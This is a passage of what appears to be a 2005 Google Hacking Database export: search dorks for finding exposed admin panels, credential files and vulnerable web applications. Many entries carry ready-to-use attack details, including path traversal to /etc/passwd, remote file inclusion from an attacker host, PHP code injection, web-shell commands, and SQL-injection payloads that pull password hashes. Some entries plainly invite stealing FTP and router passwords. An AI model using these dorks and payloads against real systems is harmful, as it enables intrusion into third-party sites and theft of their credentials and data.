This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.", "submited": "2005-08-30", "request": "intitle:guestbook inurl:guestbook \"powered by Adva", "id": 1084}, {"short description": "intext:\"Master Account\" \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "long description": "qmail mail admin login pages.There are several vulnerabilities relating to this software", "submited": "2005-08-30", "request": "intext:\"Master Account\" \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "id": 1085}, {"short description": "intitle:\"web-cyradm\"|\"by Luc de Louw\" \"This is only for authorized users\" -tar.gz -site:web-cyradm.org -johnny.ihackstuff", "long description": "Web-cyradm is a software that glues topnotch mailing technologies together. The focus is on administrating small and large mailing environments.Web-cyradm is used by many different users. At the low end this are homeusers which are providing mailadresses to their family. On the mid to top end users are SME enterprises, educational and other organizations.The software on which web-cyradm relies on is completely free and opensource software. 
So you get the maximung flexibility which the lowest TCO.", "submited": "2005-08-30", "request": "intitle:\"web-cyradm\"|\"by Luc de Louw\" \"This is only for authorized users\" -tar.gz -site:web-cyradm.org -johnny.ihackstuff", "id": 1086}, {"short description": "\"Powered by FUDForum 2.7\" -site:fudforum.org -johnny.ihackstuff", "long description": "FUDforum is prone to a remote arbitrary PHP file upload vulnerability.An attacker can merge an image file with a script file and upload it to an affected server.This issue can facilitate unauthorized remote access.FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.Affected versions:2.7", "submited": "2005-08-30", "request": "\"Powered by FUDForum 2.7\" -site:fudforum.org -johnny.ihackstuff", "id": 1087}, {"short description": "\"You have requested to access the management functions\" -.edu", "long description": "Terracotta web manager admin login portal.", "submited": "2005-08-30", "request": "\"You have requested to access the management functions\" -.edu", "id": 1088}, {"short description": "\"Please authenticate yourself to get access to the management interface\"", "long description": "Photo gallery managment system login", "submited": "2005-08-30", "request": "\"Please authenticate yourself to get access to the management interface\"", "id": 1089}, {"short description": "ext:inc \"pwd=\" \"UID=\"", "long description": "Database connection strings including passwords", "submited": "2005-08-31", "request": "ext:inc \"pwd=\" \"UID=\"", "id": 1090}, {"short description": "inurl:chitchat.php \"choose graphic\"", "long description": "rgod advises:Cyber-Cats ChitCHat 2.0 permit cross site scripting attacks, let users launch exploits from, let remote users obtain informations on target users, let insecurely delete/create files. 
This search does not find vulnerable versions, only generic.software:site: http://www.cyber-cats.com/php/rgodsite: http://rgod.altervista.orgmail: retrogod@aliceposta.it[/code]", "submited": "2005-09-04", "request": "inurl:chitchat.php \"choose graphic\"", "id": 1091}, {"short description": "\"Calendar programming by AppIdeas.com\" filetype:php", "long description": "phpCommunityCalendar 4.0.3 (possibly prior versions) sql injection / login bypass / cross site scripting This search does not narrow to vulnerable versions.software:site: http://open.appideas.comdownload: http://open.appideas.com/Calendar/original advisory: http://rgod.altervista.org/phpccal.html", "submited": "2005-09-05", "request": "\"Calendar programming by AppIdeas.com\" filetype:php", "id": 1092}, {"short description": "\"Powered by MD-Pro\" | \"made with MD-Pro\"", "long description": "MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution/ cross site scripting / path disclosure. This search does not find vulnerable versions.software:site: http://www.maxdev.com/description: http://www.maxdev.com/AboutMD.phtmloriginal advisory: http://rgod.altervista.org/maxdev1073.html", "submited": "2005-09-05", "request": "\"Powered by MD-Pro\" | \"made with MD-Pro\"", "id": 1093}, {"short description": "\"Software PBLang\" 4.65 filetype:php", "long description": "my advisory:[quote]PBLang 4.65 (possibly prior versions) remote code execution / administrativecredentials disclosure / system information disclosure / cross site scripting /path disclosuresoftware:description: PBLang is a powerful flatfile Bulletin Board System. It combinesmany features of a professional board, but does not even require SQL support. Itis completely based on text-file.site: http://pblang.drmartinus.de/download: https://sourceforge.net/project/showfiles.php?group_id=629531) system disclosure:you can traverse directories and see any file (if not .php or .php3 etc.) 
andinclude any file on target system using '../' chars and null byte (%00), example:http://target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd%00vulnerable code in setcookie.php: ...16 $usrname=$HTTP_GET_VARS['u'];17 @include($dbpath.'/'.$usrname.'temp'); ...2) remote code execution:board stores data in files, when you register a [username] file without extensionis created in /db/members directory, inside we have php code executed when youlogin, so in location field type:madrid\"; system($HTTP_POST_VARS[cmd]); echo \"in /db/members/[username] file we have...$userlocation=\"madrid\"; system($HTTP_GET_VARS[cmd]); echo \"\";...no way to access the script directly, /db/members is .htaccess protectedand extra lines are deleted from files after you login, so you should makeall in a POST request and re-registerthis is my proof of concept exploit, to include [username] file I make a GET request of setcookie.php?u=[username]%00&cmd=[command] but you can call username file through some other inclusion surely when you surf the forum:http://rgod.altervista.org/pblang465.html 3)admin/user credentials disclosure:you can see password hash of any user or admin sending the command:cat ./db/members/[username]4) cross site scripting:register and in location field type:madrid\"; echo \"alert(document.cookie)then check this url:http://[target]/[path]/setcookie.php?u=[username]%005) path disclosure:http://[target]/[path]/setcookie.php?u=%00googledork: \"Software PBLang\" filetype:phprgodsite: http://rgod.altervista.orgmail: retrogod@aliceposta.itoriginal advisory: http://rgod.altervista.org/pblang465.html[/quote]", "submited": "2005-09-07", "request": "\"Software PBLang\" 4.65 filetype:php", "id": 1094}, {"short description": "\"Powered by and copyright class-1\" 0.24.4", "long description": "class-1 Forum Software v 0.24.4 Remote code executionsoftware: site: http://www.class1web.co.uk/softwaredescription: class-1 Forum Software is a PHP/MySQL driven web forum. 
It is written and distributedunder the GNU General Public License which means that its source is freely-distributedand available to the general public. vulnerability: the way the forum checks attachment extensions...look at the vulnerable code at viewforum.php 256-272 lines.nothing seems so strange, but... what happen if you try to upload a filewith this name? :shell.php.' or 'a' ='a;)[1] SQL INJECTION!The query and other queries like this become:SELECT * FROM [extensions table name] WHERE extension='' or 'a' ='a' AND file_type='Image'you have bypassed the check... now an executable file is uploaded, because for Apache, bothon Windows and Linux a file with that name is an executable php file...you can download a poc file from my site, at url:http://rgod.altervista.org/shell.zipinside we have:you can do test manually, unzip the file, register, login, post this file as attachment, thengo to this url to see the directory where the attachment has been uploaded:http://[target]/[path]/viewattach.phpyou will be redirected to:http://[target]/[path]/[upload_dir]/then launch commands:http://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20/etc/passwdto see /etc/passwd filehttp://[target]/[path]/[upload_dir]/shell.php.'%20or%20'a'%20='a?command=cat%20./../db_config.incto see database username and passwordand so on...you can see my poc exploit at this url:http://www.rgod.altervista.org/class1.htmlgoogledork: \"Powered by and copyright class-1\"rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta . 
it", "submited": "2005-09-08", "request": "\"Powered by and copyright class-1\" 0.24.4", "id": 1095}, {"short description": "\"Powered by Xcomic\"", "long description": "\"Powered by xcomic\"this is a recent exploit, you can retrieve any file on target systemby using \"../\" chars and null byte (%00), example:http://target/path_to_xcomic/initialize.php?xcomicRootPath=../../../../etc/passwd%00or launch commands:http://target/path_to_xcomic/initiailze.php?xcomicRootPath=http://[evil_site]/cmd.gif?command=ls%20-la%00where cmd.gif is a file like this:I have read an advisory copy here: http://forum.ccteam.ru/archive/index.php/t-57.html", "submited": "2005-09-08", "request": "\"Powered by Xcomic\"", "id": 1096}, {"short description": "rdbqds -site:.edu -site:.mil -site:.gov", "long description": "Ceasar encryption is a rather simple encryption. You simply shift letters up or down across the entire length of the message... In the url I did this with the word \"secret\" which equals rdbqds.. (1 char shift).It appears that protected PDF documents use this very encryption to protect its documents. At least one version of adobe acrobat did. A big thank you to Golfo for the links he provided in the forum to assist.http://www.math.cankaya.edu.tr/~a.kabarcik/decrypt.html http://www.math.cankaya.edu.tr/~a.kabarcik/encrypt.html", "submited": "2005-09-08", "request": "rdbqds -site:.edu -site:.mil -site:.gov", "id": 1097}, {"short description": "\"Warning:\" \"Cannot execute a blank command in\"", "long description": "\"Warning: passthru(): Cannot execute a blank command in\" \"Warning: system(): Cannot execute a blank command in\" \"Warning: exec(): Cannot execute a blank command in\" generally: \"Warning:\" \"Cannot execute a blank command in\" this a php error message, essentially it shows hacked pages links where someone leaved a backdoor and the page has error_reporting not set to 0... 
you can execute shell commands simply appending a var, guessing variable name, usually 'cmd' or 'command' or something else, example: http://[target]/[path]/somescript.php?cmd=cat%20/etc/passwd", "submited": "2005-09-11", "request": "\"Warning:\" \"Cannot execute a blank command in\"", "id": 1098}, {"short description": "\"Mail-it Now!\" intitle:\"Contact form\" | inurl:contact.php", "long description": "Mail-it Now! 1.5 (possibly prior versions) contact.php remote code executionsite: http://www.skyminds.net/source/description: a mail form scriptvulnerability: unsecure file creation -> remote code executionwhen you post an attachment and upload it to the server (usually to \"./upload/\" dir )the script rename the file in this way:[time() function result] + [-] + [filename that user choose]spaces are simply replaced with \"_\" chars.So a user can post an executable attachment, calculate the time() result locallythen, if attachment is a file like this:can launch commands on target system, example:http://[target]/[path]/[time() result]-[filename.php]?command=cat%20/etc/passwdu can find my poc code at this url: http://rgod.altervista.org/mailitnow.html", "submited": "2005-09-11", "request": "\"Mail-it Now!\" intitle:\"Contact form\" | inurl:contact.php", "id": 1099}, {"short description": "\"maxwebportal\" inurl:\"default\" \"snitz forums\" +\"homepage\" -intitle:maxwebportal", "long description": "several vulnerabilities relating to this.MaxWebPortal is a web portal and online community system which includes features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. 
User interface allows members to add news, content, write reviews and share information among other registered users.h**p://www.maxwebportal.com/", "submited": "2005-09-13", "request": "\"maxwebportal\" inurl:\"default\" \"snitz forums\" +\"homepage\" -intitle:maxwebportal", "id": 1100}, {"short description": "\"Powered by AzDg\" (2.1.3 | 2.1.2 | 2.1.1)", "long description": "AzDGDatingLite V 2.1.3 (possibly prior versions) remote code execution software: site: http://www.azdg.com/ download page: http://www.azdg.com/scripts.php?l=english description:\" AzDGDatingLite is a Free dating script working on PHP and MySQL. Multilanguage, Multitemplate, quick/simple search, feedback with webmaster, Admin maillist, Very customizable \" etc. vulnerability: look at the vulnerable code in ./include/security.inc.php at lines ~80-90 ... else { if (isset($l) && file_exists(C_PATH.'/languages/'.$l.'/'.$l.'.php') && $l != '') { include_once C_PATH.'/languages/'.$l.'/'.$l.'.php'; include_once C_PATH.'/languages/'.$l.'/'.$l.'_.php'; } ... you can include arbitrary file on the server using \"../\" and null byte (%00) (to truncate path to the filename you choose), example: http://[target]/[path]/azdg//include/security.inc.php?l=../../../../../../../[filename.ext]%00 at the begin of the script we have: @ob_start(); look at the php ob_ start man page : \"This function will turn output buffering on. While output buffering is active no output is sent from the script (other than headers), instead the output is stored in an internal buffer.\" However, this is not a secure way to protect a script: buffer is never showned, so you cannot see arbitrary file from the target machine this time ... 
but you can execute arbirtrary commands and after to see any file :) : when you register to azdg you can upload photos, so you can upload and include a gif or jpeg file like this: usually photos are uploaded to ./members/uploads/[subdir]/[newfilename].[ext] azdg calculates [subdir] & [newfilename] using date(), time() and rand() functions you cannot calculate but you can retrieve the filename from azdg pages when file is showned on screen (!), so you can do this: http://[target]/[path]/azdg//include/security.inc.php?l=../../../members/uploads/[subdir]/[filename.ext]%00&cmd=cat%20/etc/passwd the output will be redirected to ./include/temp.txt so you make a GET request of this file and you have /etc/passwd file you can find my poc exploit at this url:http://rgod.altervista.org/azdg.html", "submited": "2005-09-13", "request": "\"Powered by AzDg\" (2.1.3 | 2.1.2 | 2.1.1)", "id": 1101}, {"short description": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "long description": "iCMS - Content Management System...Create dynamic interactive websites in minutes without knowing HTML or web programming. iCMS is a perfect balance of ease of use, flexibility, and power. If you are a Web Developer, you can dramatically decrease your Website development time, decrease your costs and deliver a product that will yield higher profits with less maintenance required!Dont think there are any vulns attached to this", "submited": "2005-09-13", "request": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "id": 1102}, {"short description": "\"Powered by: Land Down Under 800\" | \"Powered by: Land Down Under 801\" - www.neocrome.net", "long description": "Land Down Under is prone to an HTML injection vulnerability. 
This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.http://secunia.com/advisories/16878/", "submited": "2005-09-13", "request": "\"Powered by: Land Down Under 800\" | \"Powered by: Land Down Under 801\" - www.neocrome.net", "id": 1103}, {"short description": "intext:\"Master Account\" \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "long description": "There seems to be several vulns for qmail.", "submited": "2005-09-13", "request": "intext:\"Master Account\" \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "id": 1104}, {"short description": "\"powered by Gallery v\" \"[slideshow]\"|\"images\" inurl:gallery", "long description": "There is a script injection vuln for all versions.http://www.securityfocus.com/bid/14668", "submited": "2005-09-13", "request": "\"powered by Gallery v\" \"[slideshow]\"|\"images\" inurl:gallery", "id": 1105}, {"short description": "intitle:guestbook inurl:guestbook \"powered by Advanced guestbook 2.*\" \"Sign the Guestbook\"", "long description": "Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. 
An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.http://secunia.com/product/4356/http://www.packetalarm.com/sec_notices/index.php?id=2209&delimit=1#detail", "submited": "2005-09-13", "request": "intitle:guestbook inurl:guestbook \"powered by Advanced guestbook 2.*\" \"Sign the Guestbook\"", "id": 1106}, {"short description": "intitle:\"Backup-Management (phpMyBackup v.0.4 beta * )\" -johnny.ihackstuff", "long description": "phpMyBackup is an mySQL backup tool, with features like copying backups to a different server using FTP.", "submited": "2005-09-13", "request": "intitle:\"Backup-Management (phpMyBackup v.0.4 beta * )\" -johnny.ihackstuff", "id": 1107}, {"short description": "\"Powered by Monster Top List\" MTL numrange:200-", "long description": "2 Step dork - Change url to add filename \"admin.php\" (just remove index.php&stuff=1&me=2 if you have to) for the admin login.This search finds more pages rather than focusing on the admin login page itself, thus the 2 step dork is more effective.", "submited": "2005-09-13", "request": "\"Powered by Monster Top List\" MTL numrange:200-", "id": 1108}, {"short description": "\"login prompt\" inurl:GM.cgi", "long description": "GreyMatter is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.", "submited": "2005-09-13", "request": "\"login prompt\" inurl:GM.cgi", "id": 1109}, {"short description": "\"e107.org 2002/2003\" inurl:forum_post.php?nt", "long description": "e107 is prone to an input validation vulnerability. 
This issue is due to a failure in the application to properly sanitize user-supplied input.Successful exploitation of this issue will permit an attacker to create arbitrary forum message posts.http://www.securityfocus.com/bid/14699", "submited": "2005-09-13", "request": "\"e107.org 2002/2003\" inurl:forum_post.php?nt", "id": 1110}, {"short description": "filetype:dat inurl:Sites.dat", "long description": "If you want to find out FTP passwords from FlashFXP Client, just type this query in google and you'll find files called Sites.dat which contain ftp sites, usernames and passwords. If you want to use it, just install FlashFXP and copy whole section to your sites.dat file (file is in your flashFXP directory).", "submited": "2005-09-13", "request": "filetype:dat inurl:Sites.dat", "id": 1111}, {"short description": "intext:\"enable password 7\"", "long description": "some people are that stupid to keep their Cisco routers config files on site. You can easly find out configs and password alog with IP addresses of this devices. Above string let you find weak passwords, which are encrypted but can be decrypted by free tool called GetPass and provided by boson.com", "submited": "2005-09-13", "request": "intext:\"enable password 7\"", "id": 1112}, {"short description": "\"Copyright 2004 Digital Scribe v.1.4\"", "long description": "Digital Scribe v1.4 Login Bypass / SQL injection / remote code executionsoftware site: http://www.digital-scribe.org/description: \"Teachers have full control through a web-based interface. Designedfor easy installation and even easier use, the Digital Scribe has been used in thousands of schools. 
No teacher or IT Personnel needs to know any computer languages in order to install and use this intuitive system.rgodsite: http://rgod.altervista.orgemail: retrogod at aliceposta it", "submited": "2005-09-15", "request": "\"Copyright 2004 Digital Scribe v.1.4\"", "id": 1113}, {"short description": "\"you can now password\" | \"this is a special page only seen by you. your profile visitors\" inurl:imchaos", "long description": "IMchaos link tracker admin pages. Reveals AIM screennames, IP ADDRESSES AND OTHER INFO via details link. Logs can also be viewed and deleted from this page.", "submited": "2005-09-15", "request": "\"you can now password\" | \"this is a special page only seen by you. your profile visitors\" inurl:imchaos", "id": 1114}, {"short description": "XOOPS Custom Installation", "long description": "XOOPS custom installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations via pre-filled form data.", "submited": "2005-09-16", "request": "XOOPS Custom Installation", "id": 1115}, {"short description": "intitle:\"netbotz appliance\" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces", "long description": "Netbotz devices are made to monitor video, temperature, electricity and door access in server rooms. These systems usually have multiple cameras. The information by itself might not be very dangerous, but someone could use it to plan physical entrance to a server room. 
This is not good information to have publicly available.", "submited": "2005-09-16", "request": "intitle:\"netbotz appliance\" -inurl:.php -inurl:.asp -inurl:.pdf -inurl:securitypipeline -announces", "id": 1116}, {"short description": "\"Powered by PHP Advanced Transfer Manager\"", "long description": "PHP Advanced Transfer Manager v1.30 underlying system disclosure / remote command execution / cross site scriptingrgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta it", "submited": "2005-09-17", "request": "\"Powered by PHP Advanced Transfer Manager v1.30\"", "id": 1117}, {"short description": "\"Welcome to Administration\" \"General\" \"Local Domains\" \"SMTP Authentication\" inurl:admin", "long description": "This reveals admin site for Argo Software Design Mail Server.", "submited": "2005-09-17", "request": "\"Welcome to Administration\" \"General\" \"Local Domains\" \"SMTP Authentication\" inurl:admin", "id": 1118}, {"short description": "\"Powered by CuteNews\"", "long description": "CuteNews 1.4.0 (possibly prior versions) remote code executionsoftware site: http://cutephp.com/description: \"Cute news is a powerful and easy for using news management system that use flat files to store its database. It supports comments, archives, search function, image uploading, backup function, IP banning, flood protection ...\"rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta it", "submited": "2005-09-17", "request": "\"Powered by CuteNews\"", "id": 1119}, {"short description": "intitle:rapidshare intext:login", "long description": "Rapidshare login passwords.", "submited": "2005-09-18", "request": "intitle:rapidshare intext:login", "id": 1120}, {"short description": "intitle:\"PHProjekt - login\" login password", "long description": "PHProjekt is a group managing software for online calenders, chat, forums, etc. I looked around and i think the default admin login/pass is root/root. 
Results 1 - 23 of about 851 when I posted this", "submited": "2005-09-21", "request": "intitle:\"PHProjekt - login\" login password", "id": 1121}, {"short description": "Phaser numrange:100-100000 Name DNS IP \"More Printers\" index help filetype:html | filetype:shtml", "long description": "This is a search for various phaser network printers. With this search you can look for printers to print test/help pages, monitor the printer, and generally mess with people.", "submited": "2005-09-21", "request": "Phaser numrange:100-100000 Name DNS IP \"More Printers\" index help filetype:html | filetype:shtml", "id": 1122}, {"short description": "intitle:\"Orite IC301\" | intitle:\"ORITE Audio IP-Camera IC-301\" -the -a", "long description": "This search finds orite 301 netcams with audio capabilities.", "submited": "2005-09-21", "request": "intitle:\"Orite IC301\" | intitle:\"ORITE Audio IP-Camera IC-301\" -the -a", "id": 1123}, {"short description": "\"Powered by GTChat 0.95\"+\"User Login\"+\"Remember my login information\"", "long description": "There is a (adduser) remote denial of service vulnerability on version 0.95", "submited": "2005-09-23", "request": "\"Powered by GTChat 0.95\"+\"User Login\"+\"Remember my login information\"", "id": 1124}, {"short description": "http://www.google.com/search?q=intitle:%22WEB//NEWS+Personal+Newsmanagement%22+intext:%22%C2%A9+2002-2004+by+Christian+Scheb+-+Stylemotion.de%22%2B%22", "long description": "WEB//NEWS 1.4 is prone to multiple SQL injection vulnerabilities. 
These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.", "submited": "2005-09-23", "request": "intitle:\"WEB//NEWS Personal Newsmanagement\" intext:\"2002-2004 by Christian Scheb - Stylemotion.de\"+\"Version 1.4 \"+\"Login\"", "id": 1125}, {"short description": "inurl:/modcp/ intext:Moderator+vBulletin", "long description": "there have been several dorks for vBulletin, but I could not find one in the search that targets the moderators control panel login page - this search targets versions 3.0 onwards.", "submited": "2005-09-23", "request": "inurl:/modcp/ intext:Moderator+vBulletin", "id": 1126}, {"short description": "intitle:\"i-secure v1.1\" -edu", "long description": "I-Secure Login Pages", "submited": "2005-09-23", "request": "intitle:\"i-secure v1.1\" -edu", "id": 1127}, {"short description": "intitle:\"Login to the forums - @www.aimoo.com\" inurl:login.cfm?id=", "long description": "Aimoo Login Pages. \"Looking for a free message board solution? Aimoo provides one of the most powerful, feature rich, community based forum services available!\"", "submited": "2005-09-23", "request": "intitle:\"Login to the forums - @www.aimoo.com\" inurl:login.cfm?id=", "id": 1128}, {"short description": "intitle:\"Login Forum Powered By AnyBoard\" intitle:\"If you are a new user:\" intext:\"Forum Powered By AnyBoard\" inurl:gochat -edu", "long description": "Anyboard Login Portals. In addition,A vulnerability has been reported in Netbula Anyboard 9.x \"that may allow a remote attacker to gain access to sensitive data. This problem is due to an information disclosure issue that can be triggered by an attacker sending specific HTTP requests to a vulnerable host. 
This will result in sensitive information about the system being revealed to the attacker.\"", "submited": "2005-09-23", "request": "intitle:\"Login Forum Powered By AnyBoard\" intitle:\"If you are a new user:\" intext:\"Forum Powered By AnyBoard\" inurl:gochat -edu", "id": 1129}, {"short description": "\"Mimicboard2 086\"+\"2000 Nobutaka Makino\"+\"password\"+\"message\" inurl:page=1", "long description": "Mimicboard2 is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.", "submited": "2005-09-23", "request": "\"Mimicboard2 086\"+\"2000 Nobutaka Makino\"+\"password\"+\"message\" inurl:page=1", "id": 1130}, {"short description": "\"your password is\" filetype:log", "long description": "This search finds log files containing the phrase (Your password is). These files often contain plaintext passwords, although YMMV.", "submited": "2005-09-24", "request": "\"your password is\" filetype:log", "id": 1131}, {"short description": "\"admin account info\" filetype:log", "long description": "Searches for logs containing admin server account information such as username and password.", "submited": "2005-09-25", "request": "\"admin account info\" filetype:log", "id": 1132}, {"short description": "\"Warning: Supplied argument is not a valid File-Handle resource in\"", "long description": "This error message can reveal path information. This message (like other error messages) is often posted to help forums, although the message still reveals path info in this form. Consider using the site: operator to narrow search.", "submited": "2005-09-25", "request": "\"Warning: Supplied argument is not a valid File-Handle resource in\"", "id": 1133}, {"short description": "\"Maintained with Subscribe Me 2.044.09p\"+\"Professional\" inurl:\"s.pl\"", "long description": "Subscribe Me Pro 2.0.44.09p is prone to a directory traversal vulnerability. 
This is due to a lack of proper sanitization of user-supplied input. Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.http://www.securityfocus.com/bid/14817/exploit", "submited": "2005-09-25", "request": "\"Maintained with Subscribe Me 2.044.09p\"+\"Professional\" inurl:\"s.pl\"", "id": 1134}, {"short description": "\"Warning:\" \"SAFE MODE Restriction in effect.\" \"The script whose uid is\" \"is not allowed to access owned by uid 0 in\" \"on line\"", "long description": "This error message reveals full path information. Recommend use of site: operator to narrow searches.", "submited": "2005-09-25", "request": "\"Warning:\" \"SAFE MODE Restriction in effect.\" \"The script whose uid is\" \"is not allowed to access owned by uid 0 in\" \"on line\"", "id": 1135}, {"short description": "intitle:\"Admin Login\" \"admin login\" \"blogware\"", "long description": "Blogware Login Portal: \"An exciting and innovative tool for creating or enhancing your web presence. It is your key to easy publishing on the World Wide Web share pictures, video, links, documents, newsletters, opinions and more, with family, friends and colleagues. Now you can have a website without being a Webmaster. It's simple! There is no HTML to learn and no new software to download and install.\"", "submited": "2005-09-25", "request": "intitle:\"Admin Login\" \"admin login\" \"blogware\"", "id": 1136}, {"short description": "intitle:\"net2ftp\" \"powered by net2ftp\" inurl:ftp OR intext:login OR inurl:login", "long description": "net2ftp is a web-based FTP client written in PHP. Lets explain this in detail. 
Web-based means that net2ftp runs on a web server, and that you use a browser (for example Internet Explorer or Mozilla)", "submited": "2005-09-25", "request": "intitle:\"net2ftp\" \"powered by net2ftp\" inurl:ftp OR intext:login OR inurl:login", "id": 1137}, {"short description": "inurl:cartwiz/store/index.asp", "long description": "The CartWIZ eCommerce Shopping Cart System will help you build your online store through an interactive web-based e-commerce administration interface.There are, multiple sql injection and xss in cartwiz asp cart.http://neworder.box.sk/explread.php?newsid=13534", "submited": "2005-09-25", "request": "inurl:cartwiz/store/index.asp", "id": 1138}, {"short description": "intitle:\"Control panel\" \"Control Panel Login\" ArticleLive inurl:admin -demo", "long description": "Build, manage and customize your own search engine friendly news / article site from scratch -- with absolutely no technical experience.Authentication bypass, sql injections and xss in ArticleLive 2005http://neworder.box.sk/explread.php?newsid=13582", "submited": "2005-09-25", "request": "intitle:\"Control panel\" \"Control Panel Login\" ArticleLive inurl:admin -demo", "id": 1139}, {"short description": "\"Powered by autolinks pro 2.1\" inurl:register.php", "long description": "AutoLinksPro is a linking solution. 
AutoLinksPro link exchange software was built for the search engines to help improve your search engine rankings, traffic, and sales.Remote PHP File Include Vulnerabilityhttp://www.securityfocus.com/archive/1/409529/30/120/threaded", "submited": "2005-09-25", "request": "\"Powered by autolinks pro 2.1\" inurl:register.php", "id": 1140}, {"short description": "\"CosmoShop by Zaunz Publishing\" inurl:\"cgi-bin/cosmoshop/lshop.cgi\" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*", "long description": "cosmoshop is a comercial shop system written as a CGI.vulnerabilities:sql injection, passwords saved in cleartext, view any filehttp://www.securityfocus.com/archive/1/409510/30/120/threaded", "submited": "2005-09-25", "request": "\"CosmoShop by Zaunz Publishing\" inurl:\"cgi-bin/cosmoshop/lshop.cgi\" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*", "id": 1141}, {"short description": "\"Powered by Woltlab Burning Board\" -\"2.3.3\" -\"v2.3.3\" -\"v2.3.2\" -\"2.3.2\"", "long description": "It's an exact replica of vbulletin but it is free.SQL-Injection Exploit:http://www.governmentsecurity.org/archive/t14850.html", "submited": "2005-09-25", "request": "\"Powered by Woltlab Burning Board\" -\"2.3.3\" -\"v2.3.3\" -\"v2.3.2\" -\"2.3.2\"", "id": 1142}, {"short description": "\"Please login with admin pass\" -\"leak\" -sourceforge", "long description": "PHPsFTPd is a web based administration and configuration interface for the SLimFTPd ftp serverIt can be used an any http server that suports PHP and does not need a database or adittional php modules, only SlimFTPD It allows the administrators of the ftp server to configurate it from within this interface as opposed to its native ascii conf.file It shows statistics about the users that accesed the server , the files that were downloaded , server breakdowns etcAdmin password leak:http://cert.uni-stuttgart.de/archive/bugtraq/2005/07/msg00209.html", "submited": "2005-09-25", 
"request": "\"Please login with admin pass\" -\"leak\" -sourceforge", "id": 1143}, {"short description": "intitle:\"PHP TopSites FREE Remote Admin\"", "long description": "PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.PHP TopSites Discloses Configuration Data to Remote Users:http://www.securitytracker.com/alerts/2005/Jul/1014552.htmlPS: all versions are vulnerable at time of writing.", "submited": "2005-09-25", "request": "intitle:\"PHP TopSites FREE Remote Admin\"", "id": 1144}, {"short description": "intitle:\"iDevAffiliate - admin\" -demo", "long description": "Affiliate Tracking Software \tAdding affiliate tracking software to your site is one of the most effective ways to achieve more sales and more traffic! Our affiliate software installs in just minutes and integrates easily intoyour existing website.", "submited": "2005-09-25", "request": "intitle:\"iDevAffiliate - admin\" -demo", "id": 1145}, {"short description": "\"powered by my little forum\"", "long description": "My Little Forum 1.5 / 1.6beta SQL Injectionsoftware:site: http://www.mylittlehomepage.net/my_little_forumsoftware: \"A simple web-forum that supports classical thread view (message tree)as well as messagebord view to display the messages.Requires PHP > 4.1 and a MySQL database.\"1) look at the vulnerable code at line 144 inside search.php:... $result = mysql_query(\"SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL \". 
$time_difference.\" HOUR,'\".$lang['time_format'].\"') AS Uhrzeit, DATE_FORMAT(time + INTERVAL \".$time_difference.\" HOUR, '\".$lang['time_format'].\"') AS Datum, subject, name, email, hp, place, text, category FROM \".$forum_table.\" WHERE \".$search_string.\" ORDER BY tid DESC, time ASC LIMIT \".$ul.\", \" .$settings['search_results_per_page'], $connid);...now goto the search page, select \"phrase\", and type:[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name='[username]' /*if magic quotes are off you will have (guess?...) any admin/user password hash'cause $searchstring var is not filtered...u can fin my poc exploit here:http://rgod.altervista.org/mylittle15_16b.html2) 1.6beta is vulnerable even, we have:...$result = mysql_query(\"SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL \".$time_difference.\" HOUR) ASUhrzeit, subject, name, email, hp, place, text, category FROM \".$db_settings['forum_table'].\"WHERE \".$search_string.\" ORDER BY tid DESC, time ASC LIMIT \".$ul.\", \".$settings['search_results_per_page'],$connid);...you have same results, deleting a statement in injection string:[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata 